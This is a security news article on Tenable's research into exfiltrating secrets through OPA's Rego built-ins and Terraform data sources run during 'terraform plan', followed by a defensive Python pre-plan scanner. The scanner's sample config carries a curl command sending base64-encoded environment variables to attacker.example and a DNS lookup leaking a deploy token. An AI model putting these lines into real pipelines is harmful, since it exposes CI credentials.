Cybersecurity researchers have disclosed two new attack techniques against infrastructure-as-code (IaC) and policy-as-code (PaC) tools such as HashiCorp's Terraform and Open Policy Agent (OPA). Both techniques abuse the dedicated, domain-specific languages (DSLs) these tools evaluate to breach cloud platforms and exfiltrate data.
"Since these are hardened languages with limited capabilities, they are supposed to be more secure than standard programming languages – and indeed they are," Tenable senior security researcher Shelly Raban said in a technical report published last week. "However, more secure does not mean bulletproof."
OPA is a popular, open-source policy engine that lets organizations enforce policies across cloud-native environments such as microservices, CI/CD pipelines, and Kubernetes. Policies are written in a declarative policy language called Rego, which OPA evaluates against the input it receives to return a decision.
The attack method devised by Tenable targets the supply chain: an attacker who gains unauthorized access through a compromised access key inserts a malicious Rego policy into an OPA server. That policy is then consulted during the policy decision phase, and because Rego exposes a built-in function called "http.send," the policy itself can perform malicious actions such as exfiltrating credentials contained in the decision input to an attacker-controlled endpoint.
Even where an OPA deployment restricts the use of http.send, the company found that another built-in, "net.lookup_ip_addr," can be used to smuggle the same data out through DNS lookups, a technique known as DNS tunneling: the secret is encoded into the hostname being resolved, and the query travels through the organization's resolvers to a zone the attacker controls.
"So, the net.lookup_ip_addr function is another function you might consider restricting or at least looking for in policies, as it also introduces the risk of data exfiltration from your OPA deployment," Raban said.
Terraform, like OPA, aims to simplify setting up, deploying, and managing cloud resources through code-based definitions. Those configurations are written in another declarative DSL called HashiCorp Configuration Language (HCL).
An attacker could target the open-source IaC platform by taking advantage of its "terraform plan" command, which is typically triggered as part of GitHub "pull_request" workflows, to execute unreviewed changes containing a malicious data source during the CI/CD process. Unlike resources, which are only created by "terraform apply," data sources are evaluated while the plan is being computed, so a plan run on an unmerged pull request already executes them under the pipeline's credentials.
"This poses a risk, as an external attacker in a public repository or a malicious insider (or an external attacker with a foothold) in a private repository could exploit a pull request for their malicious goals," Tenable noted. "Data sources run during 'terraform plan,' which significantly lowers the entry point for attackers."
The malicious data source could be a rogue "external" data source (which runs a local program and returns its output), a Terraform module pulled from an untrusted location, or a DNS data source used as an exfiltration channel, which is why only third-party components from trusted sources should be used. Some of the other recommendations to mitigate such risks include –
- Implement granular role-based access control (RBAC) and follow the principle of least privilege
- Set up application-level and cloud-level logging for monitoring and analysis
- Limit the network and data access of the applications and the underlying machines
- Prevent automatic execution of unreviewed and potentially malicious code in CI/CD pipelines
Furthermore, organizations can use IaC scanning tools such as Terrascan and Checkov to identify misconfigurations and compliance issues before deployment.
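As an added example (not the Tenable research and not code from Terraform, Terrascan or Checkov), the block below covers the pull-request scenario described above: a constructed Terraform change that carries an "external" data source, a DNS data source and an unvetted module, together with a small pre-plan check that flags plan-time data sources and module sources outside an allowlist so that a CI job can refuse to run "terraform plan" on the pull request. The collector hostname, variable names, module paths and the allowlist are assumptions made for the example.

```python
"""Added example (not the Tenable research or this article's code): a constructed
Terraform change of the kind described above and a pre-plan check that flags
plan-time data sources and unvetted module sources before `terraform plan`
is allowed to run on a pull request. Names, hosts and the allowlist are made up."""
import re

# Constructed pull-request content. Everything below is evaluated during
# `terraform plan`, i.e. before any human has reviewed the change.
PR_CONFIG = r'''
terraform {
  required_providers {
    external = { source = "hashicorp/external" }
    dns      = { source = "hashicorp/dns" }
  }
}

# hashicorp/external runs `program` on the CI runner and uses its stdout
# as the data source value; the program can do anything the runner can.
data "external" "fetch_settings" {
  program = ["sh", "-c", "curl -s -d \"$(env | base64 -w0)\" https://collector.attacker.example/ci"]
}

# hashicorp/dns resolves `host` at plan time: a lookup against an
# attacker-controlled zone leaks whatever is embedded in the name.
data "dns_a_record_set" "beacon" {
  host = "${var.deploy_token}.exfil.attacker.example"
}

# Legitimate, allowlisted module.
module "vpc" {
  source  = "terraform-aws-modules/vpc/aws"
  version = "5.1.2"
}

# Module pulled from an arbitrary repository: its own data sources and
# provisioners also run under the pipeline's credentials.
module "helper" {
  source = "git::https://github.com/not-your-org/helper.git"
}
'''

DATA_RE = re.compile(r'^\s*data\s+"([^"]+)"\s+"([^"]+)"', re.M)
MODULE_RE = re.compile(r'^\s*module\s+"([^"]+)"\s*\{(.*?)^\}', re.M | re.S)
SOURCE_RE = re.compile(r'^\s*source\s*=\s*"([^"]+)"', re.M)

# Data source types that reach outside Terraform at plan time.
RISKY_DATA_TYPES = {"external", "http"}        # external runs a program, http fetches a URL
RISKY_DATA_PREFIXES = ("dns_",)                # hashicorp/dns lookups
# Constructed allowlist: the registry namespace and org repositories we vet.
TRUSTED_MODULE_PREFIXES = ("terraform-aws-modules/", "git::https://github.com/our-org/")


def scan_terraform(src: str) -> list[tuple[str, str, str]]:
    """Return (kind, name, reason) findings for one Terraform source file."""
    findings = []
    for dtype, dname in DATA_RE.findall(src):
        if dtype in RISKY_DATA_TYPES or dtype.startswith(RISKY_DATA_PREFIXES):
            findings.append(("data", f"{dtype}.{dname}", "evaluated during terraform plan"))
    for mname, body in MODULE_RE.findall(src):
        m = SOURCE_RE.search(body)
        source = m.group(1) if m else ""
        if not source.startswith(TRUSTED_MODULE_PREFIXES):
            findings.append(("module", mname, f"untrusted source {source!r}"))
    return findings


def plan_allowed(src: str) -> bool:
    """Gate for the CI job: run `terraform plan` on a PR only when nothing was flagged."""
    return not scan_terraform(src)


if __name__ == "__main__":
    for kind, name, reason in scan_terraform(PR_CONFIG):
        print(f"BLOCK {kind} {name}: {reason}")
    print("plan allowed:", plan_allowed(PR_CONFIG))
```

The check is deliberately coarse (regular expressions over HCL rather than a full parser) because its job is to stop the plan from running automatically on untrusted input; the fuller policy scan can then happen once a maintainer has approved the workflow run. Note that a legitimate-looking module source still needs a pinned version or commit, since a trusted repository whose default branch changes after review has the same effect as an untrusted one.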